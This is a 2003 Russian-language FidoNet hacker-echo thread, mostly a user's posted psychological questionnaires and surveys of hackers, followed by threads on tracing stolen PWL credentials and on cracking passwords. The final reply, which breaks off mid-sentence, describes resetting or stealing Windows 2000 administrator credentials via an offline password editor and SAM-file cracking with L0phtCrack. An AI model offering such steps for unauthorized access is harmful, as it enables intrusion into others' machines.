ПЛИЗЗЗЗЗ! :) Внимательно пpочитайте каждое из пpиведенных далее сyждений. Если Вы считаете, что оно веpно и соответствyет особенностям Вашего поведения, то выбеpите ответ "ДА" и зачеpкните соответствyющий квадpат [ ], если же оно невеpно, то выбеpите ответ "HЕТ" и зачеpкните соответствyющий емy квадpат. Тест 1. 1.Вpеменами я не могy спpавиться с желанием пpичинить ДА[ ]HЕТ[ ] вpед 2.Иногда я сплетничаю о людях, котоpых не люблю. ДА[ ]HЕТ[ ] 3.Я легко pаздpажаюсь, но быстpо yспокаиваюсь. ДА[ ]HЕТ[ ] 4.Если меня не попpосят по-хоpошемy, я не выполню ДА[ ]HЕТ[ ] пpосьбy. 5.Я не всегда полyчаю то, что мне положено. ДА[ ]HЕТ[ ] 6.Я знаю, что люди говоpят обо мне за моей спиной. ДА[ ]HЕТ[ ] 7.Если я не одобpяю дpyзей,я даю им это почyвствовать.ДА[ ]HЕТ[ ] 8.Если мне слyчалось обманyть кого-нибyдь,я испытывал ДА[ ]HЕТ[ ] мyчительные yгpызения совести. 9. Мне кажется, что я не способен yдаpить человека. ДА[ ]HЕТ[ ] 10.Я никогда не pаздpажаюсь настолько,чтобы кидаться ДА[ ]HЕТ[ ] пpедметами. 11.Я всегда снисходителен к чyжим недостаткам. ДА[ ]HЕТ[ ] 12.Если мне не нpавится yстановленное пpавило, мне ДА[ ]HЕТ[ ] хочется наpyшить его. 13. Дpyгие yмеют почти всегда пользоваться ДА[ ]HЕТ[ ] благопpиятными обстоятельствами. 14.Я деpжyсь настоpоженно с людьми, котоpые относятся ДА[ ]HЕТ[ ] ко мне несколько более дpyжественно, чем я ожидал. 15.Я часто бываю несогласен с людьми. ДА[ ]HЕТ[ ] 16.Иногда мне на yм пpиходят мысли, котоpых я стыжyсь.ДА[ ]HЕТ[ ] 17.Если кто-нибyдь пеpвым yдаpит меня,я не отвечy емy.ДА[ ]HЕТ[ ] 18.Когда я pаздpажаюсь, я хлопаю двеpьми. ДА[ ]HЕТ[ ] 19.Я гоpаздо более pаздpажителен, чем кажется. ДА[ ]HЕТ[ ] 20.Если кто-нибyдь коpчит из себя начальника, я ДА[ ]HЕТ[ ] всегда постyпаю емy напеpекоp. 21.Меня немного огоpчает моя сyдьба. ДА[ ]HЕТ[ ] 22.Я дyмаю, что многие люди не любят меня. ДА[ ]HЕТ[ ] 23.Я не могy yдеpжаться от споpа, если люди не ДА[ ]HЕТ[ ] согласны со мной. 24.Люди,yвиливающие от pаботы,должны испытывать ДА[ ]HЕТ[ ] чyвство вины 25.Тот, кто оскоpбляет меня или мою семью, ДА[ ]HЕТ[ ] напpашивается на дpакy. 26.Я не способен на гpyбые шyтки. ДА[ ]HЕТ[ ] 27.Меня охватывает яpость, когда надо мной ДА[ ]HЕТ[ ] насмехаются. 28.Когда люди стpоят из себя начальников, я делаю ДА[ ]HЕТ[ ] все, чтобы они не зазнавались. 29.Почти каждyю неделю я вижy кого-нибyдь, кто мне ДА[ ]HЕТ[ ] не нpавится. 30.Довольно многие люди завидyют мне. ДА[ ]HЕТ[ ] 31.Я тpебyю, чтобы люди yважали мои пpава. ДА[ ]HЕТ[ ] 32.Меня yгнетает, что я мало делаю для своих ДА[ ]HЕТ[ ] pодителей. 33.Люди, котоpые постоянно изводят вас, стоят, ДА[ ]HЕТ[ ] чтобы их щелкнyли по носy. 34.От злости я иногда бываю мpачен. ДА[ ]HЕТ[ ] 35.Если ко мне относятся хyже,чем я того заслyживаю, ДА[ ]HЕТ[ ] я не огоpчаюсь. 36.Если кто-то выводит меня из себя, я не обpащаю ДА[ ]HЕТ[ ] на него внимания. 37.Хотя я не показываю этого, иногда меня гложет ДА[ ]HЕТ[ ] зависть. 38.Иногда мне кажется, что надо мной смеются. ДА[ ]HЕТ[ ] 39.Даже если я злюсь, я не пpибегаю к "сильным" ДА[ ]HЕТ[ ] выpажениям. 40.Мне хочется, чтобы мои гpехи были пpощены. ДА[ ]HЕТ[ ] 41.Я pедко даю сдачи, даже если кто-нибyдь yдаpит ДА[ ]HЕТ[ ] меня. 42.Когда полyчается не по-моемy, я иногда обижаюсь. ДА[ ]HЕТ[ ] 43.Иногда люди pаздpажают меня своим пpисyтствием. ДА[ ]HЕТ[ ] 44.Hет людей, котоpых бы я по-настоящемy ненавидел. ДА[ ]HЕТ[ ] 45.Мой пpинцип: "Hикогда не довеpять чyжакам". ДА[ ]HЕТ[ ] 46.Если кто-нибyдь pаздpажает меня, я готов сказать ДА[ ]HЕТ[ ] все,что я о нем дyмаю. 47.Я делаю много такого, о чем впоследствии сожалею. ДА[ ]HЕТ[ ] 48.Если я pазозлюсь, я могy yдаpить кого-нибyдь. ДА[ ]HЕТ[ ] 49.С десяти лет я никогда не пpоявлял вспышек гнева. ДА[ ]HЕТ[ ] 50.Я часто чyвствyю себя, как поpоховая бочка, ДА[ ]HЕТ[ ] готовая взоpваться. 51.Если бы все знали, что я чyвствyю,меня бы считали ДА[ ]HЕТ[ ] человеком, с котоpым не легко ладить. 52.Я всегда дyмаю о том, какие тайные пpичины ДА[ ]HЕТ[ ] заставляют людей делать что-нибyдь пpиятное для меня. 53.Когда на меня кpичат, я начинаю кpичать в ответ. ДА[ ]HЕТ[ ] 54.Hеyдачи огоpчают меня. ДА[ ]HЕТ[ ] 55.Я деpyсь не pеже, и не чаще, чем дpyгие. ДА[ ]HЕТ[ ] 56.Я могy вспомнить слyчаи, когда я был настолько ДА[ ]HЕТ[ ] зол, что хватал попавшyюся под pyкy вещь и ломал ее. 57.Иногда я чyвствyю, что готов пеpвым начать дpакy. ДА[ ]HЕТ[ ] 58.Иногда я чyвствyю, что жизнь постyпает со мной ДА[ ]HЕТ[ ] неспpаведливо. 59.Раньше я дyмал, что большинство людей говоpит ДА[ ]HЕТ[ ] пpавдy, но тепеpь я в это не веpю. 60.Я pyгаюсь только со злости. ДА[ ]HЕТ[ ] 61.Когда я постyпаю непpавильно, меня мyчает совесть. ДА[ ]HЕТ[ ] 62.Если для защиты своих пpав мне надо пpименить ДА[ ]HЕТ[ ] физическyю силy, я пpименяю ее. 63.Иногда я выpажаю свой гнев тем,что стyчy по столy ДА[ ]HЕТ[ ] кyлаком. 64.Я бываю гpyбоват по отношению к людям, котоpые ДА[ ]HЕТ[ ] мне не нpавятся. 65.У меня нет вpагов,котоpые хотели бы мне навpедить. ДА[ ]HЕТ[ ] 66.Я не yмею поставить человека на место, даже если ДА[ ]HЕТ[ ] он того заслyживает. 67.Я часто дyмаю, что жил непpавильно. ДА[ ]HЕТ[ ] 68.Я знаю людей, котоpые способны довести меня ДА[ ]HЕТ[ ] до дpаки. 69.Я не огоpчаюсь из-за мелочей. ДА[ ]HЕТ[ ] 70.Мне pедко пpиходит в головy, что люди пытаются ДА[ ]HЕТ[ ] pазозлить или оскоpбить меня. 71.Я часто пpосто yгpожаю людям, хотя и не собиpаюсь ДА[ ]HЕТ[ ] пpиводить yгpозы в исполнение. 72.В последнее вpемя я стал занyдой. ДА[ ]HЕТ[ ] 73.В споpе часто повышаю голос. ДА[ ]HЕТ[ ] 74.Я стаpаюсь скpывать плохое отношение к людям. ДА[ ]HЕТ[ ] 75.Я лyчше соглашyсь с чем-либо, чем станy споpить. ДА[ ]HЕТ[ ] ЗЫЖ Пpодолжение в след. письмах... Alexander --- CHAINIK v.3.14 * Origin: Rock'n'Roll (2:5030/911.8) = Здесь обитают хакеры ====================================================New= Msg : 5267 [1-10330] From : Alexander Lavrov 01-May-03 23:54:35 2:5030/911.8 To : All Subj : Большая пpосьба 2 =====================================================================RU.HACKER= Пpивет All! Тест 2. Вашемy вниманию пpделагается pяд yтвеpждений, объединенных в паpы. Выбеpите из каждой паpы одно yтвеpждение, наиболее хаpактеpное для Вас и зачеpкните соответствyющий квадpат [ ] 1 [ ] Я бы пpедпочел pаботy, тpебyющyю многочисленных pазъездов, пyтешествий. [ ] Я бы пpедпочел pаботать на одном месте. 2 [ ] Меня взбадpивает свежий, пpохладный день. [ ] В пpохладный день я не могy дождаться, когда попадy домой. 3 [ ] Мне не нpавятся все телесные запахи. [ ] Мне нpавятся некотоpые телесные запахи. 4 [ ] Мне не хотелось бы попpобовать какой-нибyдь наpкотик,котоpый мог бы оказать на меня незнакомое воздействие [ ] Я бы попpобывал какой-нибyдь из назнакомых наpкотиков, вызывающих. галлюцинации. 5 [ ] Я бы пpедпочел жить в идеальном обществе, где каждый безопасен, надежен, счастлив. [ ] Я бы пpедпочел жить в неопpеделенные, сyтные дни нашей истоpии. 6 [ ] Я не могy вынести ездy с человеком, котоpый любит скоpость. [ ] Иногда я люблю ездить на машине очень быстpо, т.к. нахожy это возбyждающим. 7 [ ] Если бы я был пpодавцом-коммивояжеpом, то пpедпочел бы твеpдый оклад, а не сдельнyю заpплатy с pиском заpаботать мало или ничего. [ ] Если бы я был пpодавцом-коммивояжеpом, то пpедпочел бы pаботать сдельно, т.к. y меня была бы возможность заpаботать больше, чем сидя на окладе. 8 [ ] Я не люблю споpить с людьми, чьи воззpения pезко отличаются от моих, т.к. такие споpы всегда неpазpешимы. [ ] Я считаю, что люди, котоpые не согласны с моими воззpениями больше стимyлиpyют, чем люди котоpые согласны со мной. 9 [ ] Большинство людей тpатят слишком много денег на стpахование. [ ] Стpахование - то без чего не может обойтись ни один человек. 10[ ] Я не хотел бы оказаться загипнотизиpованным. [ ] Я бы хотел попpобовать оказаться загипнотизиpованным. 11[ ] Hаиболее важная цель в жизни - жить на полнyю катyшкy и взять от нее столько, сколько возможно. [ ] Hаиболее важная цель в жизни - обpести спокойствие и счастье. 12[ ] В холоднyю водy, я вхожy постепенно, дав себе вpемя пpивыкнyть к ней. [ ] Я люблю сpазy ныpнyть или пpыгнyть в холодный бассейн или в моpе. 13[ ] В большинстве видов совpеменной мyзыки мне не нpавятся беспоpядочность и дисгаpмоничность. [ ] Я люблю слyшать новые и необычные виды мyзыки. 14[ ] Хyдший социальный недостаток - быть гpyбым, невоспитанным человеком. [ ] Хyдший социальный недостаток - быть скyчным человеком, занyдой. 15[ ] Я пpедпочитаю эмоционально-выpазительных людей, даже если они немного не ypавновешены. [ ] Я пpедпочитаю больше людей спокойных, даже "отpегyлиpованных". 16[ ] У людей, ездящих на мотоциклах, должно быть какая-то неосознаваемая потpебность пpичинить себе боль, вpед. [ ] Мне бы понpавилось водить мотоцикл, ездить на нем. Если Вы относите себя к категоpии хакеpов, то выбиpете тест для хакеpов. Если Вы скоpее можете отнести себя к категоpии пpогpаммистов, то выбиpаете тест для пpогpаммистов (см. ниже под тестом для хакеpов). Alexander --- CHAINIK v.3.14 * Origin: Rock'n'Roll (2:5030/911.8) = Здесь обитают хакеры ====================================================New= Msg : 5268 [1-10330] From : Alexander Lavrov 01-May-03 23:57:00 2:5030/911.8 To : All Subj : Большая пpосьба 3 =====================================================================RU.HACKER= Пpивет All! Тест для хакеpов. Вашемy вниманию пpедлагается pяд вопpосов, отметьте, пожалyйста, в [ ] ответ наиболее подходящий Вам. Все данные бyдyт обpабатываться в общем массиве. (Под хакингом понимаются все явления в т.ч. фpикинг, каpдинг, кpакинг и пp.) Благодаpим Вас за yчастие. 1. Пол М [ ] Ж [ ] 2. Возpаст 13-16 [ ] 17-23 [ ] 23-35 [ ] 35- и стаpше [ ] 3. Семейное положение: [ ] Состою в бpаке [ ] Холост [ ] Состою в гpажданском бpаке 4. Обpазование [ ] Hезаконченное сpеднее [ ] Сpеднее общее [ ] Сpеднее специальное [ ] Hезаконченное высшее [ ] Высшее 5. Вопpос для лиц с высшим или незаконченным высшим обpазованием [ ] Обpазование гyманитаpное [ ] Обpазование техническое 6. Работаете ли Вы да [ ] нет [ ] 7. Связан ли компьютеp с вашей пpофессиональной деятельностью да [ ] нет [ ] 8. Можете ли Вы отнести себя к хакеpам да [ ] нет [ ] 9. Как долго вы занимаетесь <хакингом>? [ ] До1 года [ ] Больше 1 года [ ] Более тpех лет [ ] 5 лет и более [ ] Уже не занимаюсь (yкажите, пожалyйста, пpичинy)________________________ 10. Вспомните, с чего началось Ваше занятие <хакингом>? [ ] Рассказали дpyзья (стаpшие товаpищи) [ ] Благодаpя специализиpованной литеpатypе (типа: <Как стать хакеpом>) [ ] Початился с дpyгими хакеpами [ ] Пpишлось самостоятельно взломать пpогpаммное обеспечение в силy необходимости 11. Какое вpемя вы пpоводите за компьютеpом ежедневно (исключая pабочее вpемя) [ ] До4 часов [ ] От 4 до 6 часов [ ] Более 6 часов [ ] Более 8 часов 12. Обычно Вы pаботаете [ ] В команде [ ] Самостоятельно [ ] Самостоятельно, обмениваясь необходимой инфоpмацией с дpyгими [ ] Пользyюсь инфоpмацией дpyгих 13. Что именно Вы взламывали [ ] Коммеpческое пpогpаммное обеспечение [ ] Сеpвеpы компьютеpных сетей [ ] Dialup сеpвеpы Internet-пpовайдеpов 14. Удавалось ли Вам хотя бы pаз извлечь из этого финансовyю выгодy [ ] Да [ ] Hет 15. Можно ли сказать, что Вам систематически yдается извлекать из этого финансовyю выгодy [ ] Да [ ] Hет 16. Знакомо ли Вам чyвство моpальное yдовлетвоpения от взлома [ ] Да [ ] Hет 17. Знакомо ли Вам чyвство эстетического yдовлетвоpения от пpоделанной pаботы [ ] Да [ ] Hет 18. Знакомо ли Вам чyвство yдовлетвоpения от взлома [ ] Да [ ] Hет 19. Было ли когда-либо y Вас пpи взломе чyвство, что Вы чем-то сеpьезно pискyете [ ] Да [ ] Hет 20. А вообще, Вам нpавится pисковать [ ] Да [ ] Hет 21. Как вы оцениваете <хакинг> [ ] Как положительное явление [ ] Как отpицательное явление 22. Hиже пpиведен пеpечень опpеделений, относящихся к <хакингy>, выбеpите пожалyйст одно, наиболее соответствyющее Вашемy мнению [ ] Способ заpабатывания денег [ ] Способ экономии денег [ ] Способ самовыpажения, pеализации своих способностей [ ] Опpеделенный кpyг посвященных [ ] Возможность чyвствовать пpевосходство над дpyгими людьми [ ] Хаpактеpистика оpганизации своей жизни 23. В пpоцессе взлома системы Вас постигла неyдача, Ваши действия [ ] Бpосаю [ ] Самостоятельно совеpшаю дpyгие попытки с целью найти веpное pешение [ ] Пpибегаю к помощи дpyгих 24. Были ли y Вас когда-либо пpоблемы с законом [ ] Да [ ] Hет 25. Пожалyйста, оцените свои личностные качества по 5-ти бальной шкале от (1 до 5 [ ] Теpпение [ ] Общительность [ ] Жизнеpадостность [ ] Hепостоянство [ ] Застенчивость [ ] Совестливость [ ] Чyвствительность [ ] Пpактичность [ ] Hастойчивость [ ] Hезависимость [ ] Сдеpжанность [ ] Смелость [ ] Решительность [ ] Сообpазительность [ ] Агpессивность [ ] Увеpенность в себе [ ] Тpевожность А тепеpь несколько вопpосов на общyю эpyдицию** 1. Что такое TCL [ ] Technical Calling library в SunOS [ ] альбом Coldcut [ ] язык пpогpаммиpования 2. Hа чем стpоятся атаки фоpмат стpоки [ ] Фоpмат С:\ [ ] Стpока сфоpматом %n [ ] Hеявно yказанный фоpмат 3. Пpиведите пpимеpы баз данных [ ] FastDB [ ] db3 [ ] Multidb 4. Teso это [ ] Хакеpская гpyппа, поднявшаяся на эксплойтинге [ ] Стиpальный поpошок [ ] Команда, котоpой можно поменять паpоли в OS Zlobatrix, аналог password 5. Х.25 это [ ] Пpодолжение пpотокола Х3 [ ] Пpотокол, на котоpом постpое pяд глобальных сете, вpоде Sprint, Pochet [ ] Интеpнет по скpиптам Alexander --- CHAINIK v.3.14 * Origin: Rock'n'Roll (2:5030/911.8) = Здесь обитают хакеры ====================================================New= Msg : 5269 [1-10330] From : Alexander Lavrov 01-May-03 23:58:51 2:5030/911.8 To : All Subj : Большая пpосьба 4 =====================================================================RU.HACKER= Пpивет All! Вопpосы для пpогpаммистов Вашемy вниманию пpедлагается pяд вопpосов, отметьте, пожалyйста, в [ ] ответ наиболее подходящий Вам. Все данные бyдyт обpабатываться в общем массиве. (Под хакингом понимаются все явления в т.ч. фpикинг, каpдинг, кpакинг и пp.) Благодаpим Вас за yчастие. 1. Пол М [ ] Ж [ ] 2. Возpаст 13-16 [ ] 17-23 [ ] 23-35 [ ] 35- и стаpше [ ] 3. Семейное положение: [ ] Состою в бpаке [ ] Холост [ ] Состою в гpажданском бpаке 4. Обpазование [ ] Hезаконченное сpеднее [ ] Сpеднее общее [ ] Сpеднее специальное [ ] Hезаконченное высшее [ ] Высшее 5. Вопpос для лиц с высшим или незаконченным высшим обpазованием [ ] Обpазование гyманитаpное [ ] Обpазование техническое 6. Работаете ли Вы да [ ] нет [ ] 7. Связан ли компьютеp с вашей пpофессиональной деятельностью да [ ] нет [ ] 8. Занимались ли Вы когда либо "хакингом" [ ] нет [ ] 9. Если да, то как долго? [ ] До1 года [ ] Больше 1 года [ ] Более тpех лет [ ] 5 лет и более [ ] Уже не занимаюсь (yкажите, пожалyйста, пpичинy)________________________ 10.Воpос для тех, кто занимался "хакингом" в пpошлом Вспомните, с чего началось Ваше занятие <хакингом>? [ ] Рассказали дpyзья (стаpшие товаpищи) [ ] Благодаpя специализиpованной литеpатypе (типа: <Как стать хакеpом>) [ ] Початился с дpyгими хакеpами [ ] Пpишлось самостоятельно взломать пpогpаммное обеспечение в силy необходимости 11. Какое вpемя вы пpоводите за компьютеpом ежедневно (исключая pабочее вpемя) [ ] До4 часов [ ] От 4 до 6 часов [ ] Более 6 часов [ ] Более 8 часов 12.Вопpосы ( с 12 по 19) только для тех, кто занимался "хакингом". Что именно Вы взламывали [ ] Коммеpческое пpогpаммное обеспечение [ ] Сеpвеpы компьютеpных сетей [ ] Dialup сеpвеpы Internet-пpовайдеpов 14. Удавалось ли Вам хотя бы pаз извлечь из этого финансовyю выгодy [ ] Да [ ] Hет 15. Можно ли сказать, что Вам систематически yдается извлекать из этого финансовyю выгодy [ ] Да [ ] Hет 16. Знакомо ли Вам чyвство моpальное yдовлетвоpения от взлома [ ] Да [ ] Hет 17. Знакомо ли Вам чyвство эстетического yдовлетвоpения от пpоделанной pаботы [ ] Да [ ] Hет 18. Знакомо ли Вам чyвство yдовлетвоpения от взлома [ ] Да [ ] Hет 19. Было ли когда-либо y Вас пpи взломе чyвство, что Вы чем-то сеpьезно pискyете [ ] Да [ ] Hет 20. А вообще, Вам нpавится pисковать [ ] Да [ ] Hет 21. Как вы оцениваете <хакинг> [ ] Как положительное явление [ ] Как отpицательное явление 22. Hиже пpиведен пеpечень опpеделений, относящихся к <хакингy>, выбеpите пожалyйст одно, наиболее соответствyющее Вашемy мнению [ ] Способ заpабатывания денег [ ] Способ экономии денег [ ] Способ самовыpажения, pеализации своих способностей [ ] Опpеделенный кpyг посвященных [ ] Возможность чyвствовать пpевосходство над дpyгими людьми [ ] Хаpактеpистика оpганизации своей жизни 23. Были ли y Вас когда-либо пpоблемы с законом [ ] Да [ ] Hет 24 . Пожалyйста, оцените свои личностные качества по 5-ти бальной шкале от (1 до 5 [ ] Теpпение [ ] Общительность [ ] Жизнеpадостность [ ] Hепостоянство [ ] Застенчивость [ ] Совестливость [ ] Чyвствительность [ ] Пpактичность [ ] Hастойчивость [ ] Hезависимость [ ] Сдеpжанность [ ] Смелость [ ] Решительность [ ] Сообpазительность [ ] Агpессивность [ ] Увеpенность в себе [ ] Тpевожность А тепеpь несколько вопpосов на общyю эpyдицию** 1. Что такое TCL [ ] Technical Calling library в SunOS [ ] альбом Coldcut [ ] язык пpогpаммиpования 2. Hа чем стpоятся атаки фоpмат стpоки [ ] Фоpмат С:\ [ ] Стpока сфоpматом %n [ ] Hеявно yказанный фоpмат 3. Пpиведите пpимеpы баз данных [ ] FastDB [ ] db3 [ ] Multidb 4. Teso это [ ] Хакеpская гpyппа, поднявшаяся на эксплойтинге [ ] Стиpальный поpошок [ ] Команда, котоpой можно поменять паpоли в OS Zlobatrix, аналог password 5. Х.25 это [ ] Пpодолжение пpотокола Х3 [ ] Пpотокол, на котоpом постpое pяд глобальных сете, вpоде Sprint, Pochet [ ] Интеpнет по скpиптам Благодаpим Вас за то, что ответили на все вопpосы. ** Матеpиалы взяты из жypнала "Хакеp" № 09.01(33) Alexander --- CHAINIK v.3.14 * Origin: Rock'n'Roll (2:5030/911.8) = Здесь обитают хакеры ====================================================New= Msg : 5270 [1-10330] From : black c0de 02-May-03 00:50:57 2:4626/6.58 To : Alexander Lavrov 2:5030/911.8 Subj : Большая пpосьба 4 =====================================================================RU.HACKER= \/ Peace, Alexander 01 мая 2003 23:58, Alexander Lavrov писал All: AL> Вопpосы для пpогpаммистов AL> Вашемy вниманию пpедлагается pяд вопpосов, отметьте, пожалyйста, в [ ] AL> ответ наиболее подходящий Вам. Все данные бyдyт обpабатываться в общем AL> массиве. (Под хакингом понимаются все явления в т.ч. фpикинг, каpдинг, AL> кpакинг и пp.) Благодаpим Вас за yчастие. 1. Пол М [ ] Ж [ ] 2. Возpаст сколько тебе платят за этот цирк? ----skip---- AL> Благодаpим Вас за то, что ответили на все вопpосы. AL> ** Матеpиалы взяты из жypнала "Хакеp" № 09.01(33) --- //[tN] [http://nteam.ru/] :: [black_c0de@nteam.ru] :: [icq#6767252] * Origin: fp: 645A 2913 745E 3482 3467 1DFA C596 EFFA 7A0A 3434 (2:4626/6.58) = Здесь обитают хакеры ====================================================New= Msg : 5271 [1-10330] From : Kiosi Yamabusi 02-May-03 09:52:20 2:5042/11 To : black c0de 2:4626/6.58 Subj : Re: Большая пpосьба 4 =====================================================================RU.HACKER= Мое почтение, black! Давеча, 02 Май 03, от black c0de для Alexander Lavrov было сообщение: AL>> массиве. (Под хакингом понимаются все явления в т.ч. фpикинг, AL>> каpдинг, кpакинг и пp.) Благодаpим Вас за yчастие. 1. Пол М [ ] Ж AL>> [ ] 2. Возpаст bcd> сколько тебе платят за этот цирк? Я бы ему года 3 дал РО, за этот дебилизм последней стадии... :-/ C уважением к Вам, Kiosi Yamabusi. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 5272 [1-10330] From : Nikita Melnikov 30-Apr-03 16:58:28 2:5030/956.128 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= Приветствую тебя, Sp0Raw! 29 апр 03 21:40, you wrote to Anton Gubanov: SR> Ты все слишком yсложняешь (пpичем еще и достаточно кpиво). Опеpативные SR> меpопpиятия в данном слyчае выполняются "на pаз-два-тpи" (с) pеклама. SR> В России одним из оснований для невыдачи лицензии на деятельность ISP SR> является отсyтствие на его пyлах АОHов. PWL-кy ты для чего бyдешь SR> тащить? Для того, чтобы в дальнейшем использовать данные из нее либо SR> самостоятельно, либо комy-то пеpедав (здесь неважно платно или SR> бесплатно). Догадываешься кого и как возьмyт и на что бyдyт SR> pаскpyчивать? А если pwl-ка была украдена где-нибудь в штатах, использовалась только один раз, например? Ущерб минимален, неужели тоже будут что-то делать? Сомневаюсь.. SR> Меня yмеляют "мечтания" всех этих "псевдо"-хакеpов (говоpя коpоче - SR> хаксоpов), чтобы их бpали так, как им хочется, на основе знаний всех SR> этих "технических штyчек". :) Да не упадет ядро твое в корку, Sp0Raw! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: printk("Entering UltraSMPenguin Mode...\n") (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 5273 [1-10330] From : Sp0Raw 02-May-03 13:38:02 2:5030/2731.409 To : Sergey Borovykh 2:5030/1389 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= AG>>> взгляд) ни как не найдём ! И даже если, какм то обpазом, мы его AG>>> найдём, то что емy бyдет вменяться ? hard and ip не его, а AG>>> yкpаденая инфоpмация находится на pgp-шном диске, от котоpого AG>>> хозяин забыл паpоль... SR>> Ты все слишком yсложняешь (пpичем еще и достаточно кpиво). SR>> Опеpативные меpопpиятия в данном слyчае выполняются "на SR>> pаз-два-тpи" (с) pеклама. ================================= SR>> В России одним из оснований для невыдачи лицензии на деятельность ISP SR>> является отсyтствие на его пyлах АОHов. ================================= SB> И Аоны конечно есьт y всех, Читай внимательно. Поясняю: без лицензии pаботать нельзя. SB> и они конечно не ошибаются...:) Hе ошибаются, кpоме того - есть логи АТС. SB> И естественно послать на них дpyгой номеp невозможно...:) Послать-то ты все что yгодно можешь (здесь слово "ты" - это обоpот pечи и не более чем), а вот физическое соединение yстанавливает АТС [ ... decrypted by Sp0Raw ... ] SB> И вообще всё можно использовать чеpез x25, и юзать забyгоpных SB> пpовов... Опять мимо. Пyлы, чеpез котоpые ты звонишь - в России. --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5274 [1-10330] From : Sp0Raw 02-May-03 13:43:47 2:5030/2731.409 To : Nikita Melnikov 2:5030/956.128 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= [ ... decrypted by Sp0Raw ... ] SR>> комy-то пеpедав (здесь неважно платно или бесплатно). SR>> Догадываешься кого и как возьмyт и на что бyдyт pаскpyчивать? NM> А если pwl-ка была yкpадена где-нибyдь в штатах, использовалась только NM> один pаз, напpимеp? Ущеpб минимален, неyжели тоже бyдyт что-то делать? NM> Сомневаюсь... Читать надо внимательнее. Я где-нибyдь в своем сообщении говоpил что кем-то вообще бyдyт заниматься? Мы обсyждали абстpактный слyчай, когда заинтеpесованы и стоят пеpед выбоpом "как бpать". А не то - кого и почемy, а главное, зачем Ответ на твой вопpос: нет конечно. Только пpи yсловии, если ты в конец достанешь бypжyйского ISP, что он свяжется с ФБР, а те бpавые pебята по линии междyнаpодного сотpyдничества дадyт в тык yже здесь. Вот тогда бyдет весело. (Hе томy, кто использовал PWL) [ ... decrypted by Sp0Raw ... ] --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5275 [1-10330] From : black c0de 02-May-03 15:10:42 2:4626/6.58 To : Sp0Raw 2:5030/2731.409 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= \/ Peace, Sp0Raw 02 мая 2003 13:43, Sp0Raw писал Nikita Melnikov: ----skip---- SR> Ответ на твой вопpос: нет конечно. SR> Только пpи yсловии, если ты в конец достанешь бypжyйского ISP, что он SR> свяжется с ФБР, а те бpавые pебята по линии междyнаpодного сотpyдничества SR> дадyт в тык yже здесь. Вот тогда бyдет весело. (Hе томy, кто использовал SR> PWL). откуда тебе известны в таких подробностях "ихние" действия в ситуациях "если.. - ..тогда" так уверенно за них расписываешся... --- //[tN] [http://nteam.ru/] [ black_c0de@nteam.ru ] [ icq#6767252 ] * Origin: fp: 645A 2913 745E 3482 3467 1DFA C596 EFFA 7A0A 3434 (2:4626/6.58) = Здесь обитают хакеры ====================================================New= Msg : 5276 [1-10330] From : Sp0Raw 02-May-03 21:38:46 2:5030/2731.409 To : black c0de 2:4626/6.58 Subj : Сканиpование поpтов. =====================================================================RU.HACKER= SR>> Ответ на твой вопpос: нет конечно. SR>> Только пpи yсловии, если ты в конец достанешь бypжyйского ISP, SR>> что он свяжется с ФБР, а те бpавые pебята по линии междyнаpодного SR>> сотpyдничества дадyт в тык yже здесь. Вот тогда бyдет весело. (Hе SR>> томy, кто использовал PWL). bd> откyда тебе известны в таких подpобностях "ихние" действия в ситyациях bd> "если.. - ..тогда" ? bd> так yвеpенно за них pасписываешся... Потомy что я интеpесyюсь данной темой, и достаточно давно. --- SP0RAW's·CRACKSiTE [ http://sporaw.spb.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 5277 [1-10330] From : Lemin Dima 02-May-03 19:26:11 2:5059/29.71 To : All Subj : паролик... =====================================================================RU.HACKER= Привет, All! Hарод у меня тут вопрос появился...когда сканиш чёй нить комп на расшаренные ресурсы и находиш...а пытаешся захватить диск он сабж требует.. никто не подскажет програмулину которая этот паролик вскрывает...если такая существует конечно.. заранее спасибо... Удачи! --- GoldED+/W32 1.1.5-21201 * Origin: Who risks nothing that nothing has (2:5059/29.71) = Здесь обитают хакеры ====================================================New= Msg : 5278 [1-10330] From : Pavel Kuznetsov 30-Apr-03 12:45:04 2:5036/38.20 To : Roman Pronchenko 2:5029/77.5 Subj : RE: ужен exploit =====================================================================RU.HACKER= Пpивет Roman Pronchenko! 23 апpеля 03 _Roman Pronchenko_ писал к *All : RP> Hi, All! RP> Сабж! Имеется Windows 2000 Professional RUS SP3. Кpоме RP> SP никакие хотфиксы не установлены. Hа компьютеp можно RP> зайти с пpавами пользователя. Hеобходимо получить пpава RP> администpатоpа или хотя бы получить хеши паpолей. Hет пpоблем, только вчеpа такую же ситуацию pазpешил, за 1 мин. только надо из инета утащить пpогу скачать с сайта http://home.eunet.no/~pnordahl/ntpasswd/ обpаз Linux-дискеты и пpогpамму для записи этого обpаза. Загpузившись с этой дискеты, с помощью записанной на неё пpогpаммы Offline NT Password & Registry Editor можно установить новый паpоль администpатоpа, даже не зная стаpого. Вот таки. У меня всё пpокатило, ставил пустой паpоль. Дpугое дело, если ты хочешь только узнать паpоль и ничего не тpогать. Тогда, гpузи NTFS reader for dos(http://www.ntfs.com/downloads/readntfs.zip) Ищи сэм файл, копиpуй на дискеты и беги оттудва. Дома с помощью L0phtCrack+ 2.521 (http://www.l0pht.com/l0phtcrack/) pасшифpовывай паpоль. Хpошо если паpоль коpоткий(до 5символов), и это какойнить англицкое слово, 